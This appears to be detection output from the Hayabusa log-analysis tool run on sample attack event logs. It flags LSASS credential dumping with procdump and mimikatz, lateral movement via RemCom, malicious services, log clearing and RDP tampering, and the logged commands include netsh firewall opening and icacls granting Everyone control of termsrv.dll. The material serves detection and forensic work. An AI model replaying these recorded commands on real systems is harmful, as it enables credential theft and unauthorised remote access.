+09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3820 | PGUID: 365ABB72-E0AE-5C67-0000-0010C9B81700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 
0x311293,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolfool | Path: cmd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolsv | Path: cmd.exe | 
Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolsv | Path: cmd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp | Process: C:\Users\IEUser\Desktop\procdump.exe | PID: 1856 | PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,CredAccess,LSASS Memory Access by Tool Named 
Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\procdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1856 | Src PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP | Process: C:\Windows\system32\taskmgr.exe | PID: 3576 | PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Windows\system32\taskmgr.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3576 | Src PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200 | Tgt PID: 476 | Tgt PGUID: 
365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx 2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\mimikatz_trunk\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 3588 | Src PGUID: 365ABB72-A1E3-5C8E-0000-0010CEF72200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 2019-03-18 05:17:44.537 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\install.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:44.637 
+09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPCheck.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:44.797 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPConf.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:45.478 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPWInst.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:45.628 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\uninstall.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:45.648 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\update.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C 
""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | Process: C:\Windows\System32\cmd.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 3272 | PGUID: 365ABB72-AB70-5C8E-0000-0010781D0A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | Process: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe | User: PC04\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | LID: 0x3c004 | PID: 3700 | PGUID: 365ABB72-AB70-5C8E-0000-0010DF1F0A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,medium,Persis | PrivEsc,ServiceDll Modification,,../hayabusa-rules/sigma/registry_event/win_re_set_servicedll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Registry Modification,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow | Process: C:\Windows\System32\netsh.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | LID: 0x3c004 | PID: 3696 | PGUID: 365ABB72-AB81-5C8E-0000-001024960C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Evas,Netsh Port or Application Allowed,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Evas,Netsh RDP Port Opening,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3892 | PGUID: 365ABB72-AB81-5C8E-0000-00102E9E0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx 2019-03-18 05:18:12.096 
+09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 600 | PGUID: 365ABB72-AB84-5C8E-0000-00109EAD0C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | Process: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 4024 | PGUID: 365ABB72-ABFE-5C8E-0000-00105A560D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll | Process: C:\Windows\System32\takeown.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3708 | PGUID: 365ABB72-AC01-5C8E-0000-001011690D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3536 | PGUID: 365ABB72-AC01-5C8E-0000-0010296C0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,../hayabusa-rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3652 | PGUID: 365ABB72-AC01-5C8E-0000-0010656E0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,../hayabusa-rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:22:59.399 +09:00,PC04.example.corp,13,high,Persis,Changing RDP Port to Non Standard Number,,../hayabusa-rules/sigma/registry_event/win_re_change_rdp_port.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
